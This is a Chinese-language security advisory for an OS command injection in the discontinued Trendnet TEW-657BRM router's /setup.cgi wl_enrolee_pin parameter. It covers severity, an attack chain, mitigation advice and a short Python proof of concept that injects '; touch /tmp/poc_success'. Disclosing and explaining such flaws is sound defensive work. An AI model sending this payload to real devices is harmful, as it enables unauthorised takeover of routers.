CVE-2026-5351 CVSS 6.3 中危

CVE-2026-5351 Trendnet TEW-657BRM 命令注入漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5351

漏洞类型

OS命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Trendnet TEW-657BRM

漏洞概述

Trendnet TEW-657BRM 1.00.1版本被发现存在操作系统命令注入漏洞。该漏洞位于/setup.cgi文件的add_wps_client处理函数中，由于对用户输入的wl_enrolee_pin参数缺乏严格的过滤，导致攻击者可以注入并执行任意操作系统命令。利用此漏洞需要低权限，且无需用户交互。鉴于该产品已于2011年停产并停止支持，厂商已确认无法提供安全更新，建议用户尽快更换设备。

技术细节

该漏洞的根源在于Trendnet TEW-657BRM固件代码中存在不安全的输入处理机制。在处理WPS（Wi-Fi Protected Setup）配置请求时，/setup.cgi脚本调用了add_wps_client函数。该函数直接从HTTP请求中提取wl_enrolee_pin参数，并将其作为参数拼接到系统命令中执行，未经过任何安全过滤或转义。攻击者可以通过发送特制的数据包，利用Shell元字符（例如分号;、管道符|）截断原始命令并附加任意恶意指令。由于Web服务通常运行在较高权限环境，成功利用此漏洞可导致远程代码执行（RCE），进而完全控制路由器。

攻击链分析

STEP 1

侦察

攻击者扫描网络并识别出运行Trendnet TEW-657BRM固件的目标设备。

STEP 2

访问

攻击者访问目标设备的Web管理界面（通常为端口80）。

STEP 3

利用

攻击者向/setup.cgi发送特制的HTTP POST请求，在wl_enrolee_pin参数中注入恶意Shell命令。

STEP 4

执行

由于缺乏输入验证，后端系统将注入的参数作为系统命令执行，导致攻击者代码在设备上运行。

STEP 5

控制

攻击者获得设备控制权，可进一步窃取数据、建立后门或作为跳板攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable device
target_url = "http://192.168.10.1/setup.cgi"

# Malicious payload injecting a command to create a file
# Using semicolon to chain commands
payload = "; touch /tmp/poc_success"

# Data payload for the POST request
# The vulnerability is in the 'wl_enrolee_pin' parameter
post_data = {
    "wl_enrolee_pin": payload
}

try:
    # Send the malicious request
    response = requests.post(target_url, data=post_data)
    
    # Check response
    if response.status_code == 200:
        print("Payload sent successfully.")
        print("Check if /tmp/poc_success exists on the target.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Trendnet TEW-657BRM 1.00.1

防御指南

临时缓解措施

由于厂商已停止对该产品的支持且无法提供补丁，唯一的彻底解决方案是更换设备。在无法立即更换的情况下，应确保设备不直接暴露在公网，并关闭远程管理功能，同时在局域网内通过ACL限制对管理接口的访问，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5351
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5351
3 Details https://www.cvedetails.com/cve/CVE-2026-5351/
4 VulDB https://vuldb.com/cve/CVE-2026-5351
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-657brm/add_wps_client.md
6 Link https://vuldb.com/submit/781564
7 Link https://vuldb.com/vuln/354704
8 Link https://vuldb.com/vuln/354704/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表